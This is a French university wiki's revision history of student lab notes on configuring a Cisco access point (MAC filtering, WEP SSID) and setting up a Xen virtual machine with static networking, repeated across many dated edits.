ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
<br />
// on se connecte a notre MV<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22532
TP sysres IMA2a5 2015/2016 G3
2015-10-28T09:36:41Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
<br />
// on se connecte a notre MV<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22531
TP sysres IMA2a5 2015/2016 G3
2015-10-28T09:33:11Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
<br />
// on se connecte a notre MV<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22526
TP sysres IMA2a5 2015/2016 G3
2015-10-28T09:04:28Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoir => 1024<br />
// conexion en mode bridge=ima2a<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22525
TP sysres IMA2a5 2015/2016 G3
2015-10-28T08:59:43Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22524
TP sysres IMA2a5 2015/2016 G3
2015-10-28T08:47:06Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22523
TP sysres IMA2a5 2015/2016 G3
2015-10-28T08:46:44Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<br />
</pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22518
TP sysres IMA2a5 2015/2016 G3
2015-10-28T08:16:05Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Réalisation en monôme : Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
<h5>1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22516
TP sysres IMA2a5 2015/2016 G3
2015-10-28T07:04:33Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Réalisation en monôme : Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
<br />
</table><br />
<br />
<pre><br />
<br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22492
TP sysres IMA2a5 2015/2016 G3
2015-10-27T11:12:57Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Réalisation en monôme : Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
<br />
</table><br />
<br />
<pre><br />
<br />
# ifconfig<br />
<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22491
TP sysres IMA2a5 2015/2016 G3
2015-10-27T11:11:58Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Réalisation en monôme : Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
<br />
</table></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22490
TP sysres IMA2a5 2015/2016 G3
2015-10-27T11:11:17Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Réalisation en monôme : Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<th>Nom</th><th>adresse MAC</th></tr><br />
<th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
<br />
</table></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22489
TP sysres IMA2a5 2015/2016 G3
2015-10-27T11:09:45Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Réalisation en monôme : Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<th>Nom</th><th>adresse MAC</th><br /><br />
<br />
<th>Nounours</th><th>00:15:af:e7::19:f3</th><br /><br />
<th>Jeuno</th><th>00:15:af:e6:ed:b1</th><br /><br />
<th>John</th><th>00:22:43:43:e7:7d</th><br /><br />
<th>Loki</th><th>00:15:af:e7:64:03</th><br /><br />
<br />
</table></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22488
TP sysres IMA2a5 2015/2016 G3
2015-10-27T11:09:29Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Réalisation en monôme : Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<th>Nom</th><th>adresse MAC</th><br />
<br />
<th>Nounours</th><th>00:15:af:e7::19:f3</th><br /><br />
<th>Jeuno</th><th>00:15:af:e6:ed:b1</th><br /><br />
<th>John</th><th>00:22:43:43:e7:7d</th><br /><br />
<th>Loki</th><th>00:15:af:e7:64:03</th><br /><br />
<br />
</table></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22487
TP sysres IMA2a5 2015/2016 G3
2015-10-27T11:09:00Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Réalisation en monôme : Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<th>Nom</th><th>adresse MAC</th><br />
<br />
<th>Nounours</th><th>00:15:af:e7::19:f3</th><br />
<th>Jeuno</th><th>00:15:af:e6:ed:b1</th><br />
<th>John</th><th>00:22:43:43:e7:7d</th><br />
<th>Loki</th><th>00:15:af:e7:64:03</th><br />
<br />
</table></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22486
TP sysres IMA2a5 2015/2016 G3
2015-10-27T11:08:20Z
<p>Mstrunc : Page créée avec « <h1>Projet Système & Réseaux IMA2A S9 </h1> <br /> <h2>Partie I - Réalisation en monôme : Configuration du point d’accès</h2> <h4>a) Restriction par adresse MAC </h4... »</p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Réalisation en monôme : Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<th>Nom</th><th>adresse MAC</th><<br />
<br />
<th>Nounours</th><th>00:15:af:e7::19:f3</th><br />
<th>Jeuno</th><th>00:15:af:e6:ed:b1</th><br />
